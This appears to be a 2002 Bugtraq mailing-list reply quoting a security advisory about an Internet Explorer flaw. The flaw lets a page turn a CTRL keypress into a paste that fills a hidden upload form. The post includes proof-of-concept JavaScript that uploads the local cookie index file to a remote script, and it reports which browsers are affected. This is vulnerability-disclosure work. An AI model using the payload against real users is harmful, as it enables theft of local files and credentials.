Bugtraq mailing list archives

Re: Pressing CTRL in IE is dangerous - Sandblad advisory #8

From: Peter Pentchev <roam () ringlet net>
Date: Wed, 24 Jul 2002 11:42:01 +0300

On Tue, Jul 23, 2002 at 09:50:30PM +0200, Andreas Sandblad wrote:


                  - Sandblad advisory #8 -

---..---..---..---..---..---..---..---..---..---..---..---..----
Title:      Pressing CTRL in IE is dangerous
Date:       [2002-07-23]
Software:   Internet Explorer
Impact:     Pressing CTRL in IE may result in arbitrary local
            file to be uploaded to a remote server (no exact
            path needed). If special sensitive information is
            uploaded, it may be used to run remote programs.

[snip]

1. When an user presses the CTRL key an onkeydown event can be set to
fire. In the event function the key pressed is changed to 'V'. The result
will be a paste operation with less restrictions.

2. The content of the clipboard is altered and focus is changed to a
hidden file upload form. The paste operation will be performed into the
form, yielding a change of value for the file upload field (not normally
allowed).

3. The upload form is submited automaticly (legal javascript operation).

[snip]

<!div id=h style="zoom:0.0001">
<!form name=u enctype="multipart/form-data" method=post action=upload.php>
<!input type=file name=file></form></div>
<!script>
//uploadFile="..\\LOCALS~1\\TEMPOR~1\\CONTENT.IE5\\index.dat";
uploadFile="..\\Cookies\\index.dat";
function gotKey(){
  if (!event.ctrlKey) return;
  document.onkeydown = null;
  event.keyCode = 86;
  window.clipboardData.setData("Text",uploadFile);
  (p=document.forms.u.file).focus();
  p.onpropertychange = function(){document.forms.u.submit()};
} document.onkeydown = gotKey;
window.onload=function(){document.body.focus()};
<!/script>


This was verified to work on various versions of IE 5 and 6, and also
on Opera 6.01 build 1041.  However, Mozilla 1.0rc1 is NOT vulnerable,
partly because of a script error (the onkeypress handler should accept
a parameter instead of referring to 'event' directly), and mostly because
of the fact that in Mozilla, event.keyCode is not settable.

G'luck,
Peter

-- 
Peter Pentchev  roam () ringlet net     roam () FreeBSD org
PGP key:        http://people.FreeBSD.org/~roam/roam.key.asc
Key fingerprint FDBA FD79 C26F 3C51 C95E  DF9E ED18 B68D 1619 4553
If you think this sentence is confusing, then change one pig.

Attachment: _bin
Description:

Current thread:

Pressing CTRL in IE is dangerous - Sandblad advisory #8 Andreas Sandblad (Jul 23)
- RE: Pressing CTRL in IE is dangerous - Sandblad advisory #8 GreyMagic Software (Jul 24)
- Re: Pressing CTRL in IE is dangerous - Sandblad advisory #8 Peter Pentchev (Jul 24)
- <Possible follow-ups>
- RE: Pressing CTRL in IE is dangerous - Sandblad advisory #8 Thor Larholm (Jul 24)